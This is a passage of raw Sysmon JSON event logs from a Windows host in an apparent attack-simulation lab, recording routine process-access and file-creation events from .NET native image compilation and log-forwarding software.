C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.060","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-0010375D1000}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.060\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-0010375D1000}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.060","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-0010375D1000}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.216\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-001014611000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.216","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-001014611000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.216\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-001014611000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.216","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-001014611000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-001014611000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-001014611000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.466\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.466","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:48.420\r\nProcessGuid: {E2A3D6B1-1397-5F25-0000-001014611000}\r\nProcessId: 612\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\264-0\\System.Windows.Controls.Ribbon.dll\r\nCreationUtcTime: 2020-08-01 07:02:48.420","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:48.420","ProcessGuid":"{E2A3D6B1-1397-5F25-0000-001014611000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\264-0\\System.Windows.Controls.Ribbon.dll","CreationUtcTime":"2020-08-01 07:02:48.420","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.482\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.482","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.482\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1398-5F25-0000-00108D661000}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.482","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1398-5F25-0000-00108D661000}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4